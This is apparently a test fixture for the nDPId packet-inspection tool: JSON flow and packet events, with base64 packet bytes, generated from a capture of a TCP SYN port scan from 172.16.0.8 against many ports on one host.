+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsNOsAACwG54esEAAIQA2GNIzTD6XdU4MZAAAAAGACBAAk5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5wAACgGYNasEAAIQA2GNIzTBI7dU4MZAAAAAGACBAAv\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAspqkAADMGbsmsEAAIQA2GNIzTBTDdU4MZAAAAAGACEAAjXAAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvjkAACUGZTmsEAAIQA2GNIzTAAndU4MZAAAAAGACCAAwgwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAs1ygAAC8GQkqsEAAIQA2GNIzTrdXdU4MZAAAAAGACEAB6tgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsiLIAACsGlMCsEAAIQA2GNIzSC5jdUoMYAAAAAGACEAAc9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfMAADkGcX+sEAAIQA2GNIzSC13dUoMYAAAAAGACCAAlMgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsz0EAACkGUDGsEAAIQA2GNIzSCVndUoMYAAAAAGACCAAnNgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsLKEAADEG6tGsEAAIQA2GNIzSBC7dUoMYAAAAAGACCAAsYQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsduwAACUGrIasEAAIQA2GNIzSAP7dUoMYAAAAAGACCAAvkQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsXOUAADIGuY2sEAAIQA2GNIzSDsjdUoMYAAAAAGACDAAdxwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7oAADAGBLmsEAAIQA2GNIzSJxndUoMYAAAAAGACBAANdgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsWC0AADQGvEWsEAAIQA2GNIzSBEndUoMYAAAAAGACBAAwRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsBGsAACsGGQisEAAIQA2GNIzSJXndUoMYAAAAAGACEAADFgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvYYAACoGYOysEAAIQA2GNIzSBH\/dUoMYAAAAAGACDAAoEAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAstjcAADAGYjusEAAIQA2GNIzSEIDdUoMYAAAAAGACBAAkDwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg4AACoG7GSsEAAIQA2GNIzSwBjdUoMYAAAAAGACDABsdgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwMAACwGxW+sEAAIQA2GNIzSH0DdUoMYAAAAAGACBAAVTwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAstAkAAC0GZ2msEAAIQA2GNIzSBAPdUoMYAAAAAGACCAAsjAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsTbQAACwGzr6sEAAIQA2GNIzSAB7dUoMYAAAAAGACBAA0cQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cgAADkGOaqsEAAIQA2GNIzSFrPdUoMYAAAAAGACCAAZ3AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsDeoAACgGEomsEAAIQA2GNIzSCNTdUoMYAAAAAGACBAAruwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0UAACgGYS2sEAAIQA2GNIzSBbXdUoMYAAAAAGACBAAu2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADYGhnWsEAAIQA2GNIzSC7jdUoMYAAAAAGACDAAg1wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsQLUAACgG372sEAAIQA2GNIzS7BvdUoMYAAAAAGACBABIcwAAAgQFtA=="} 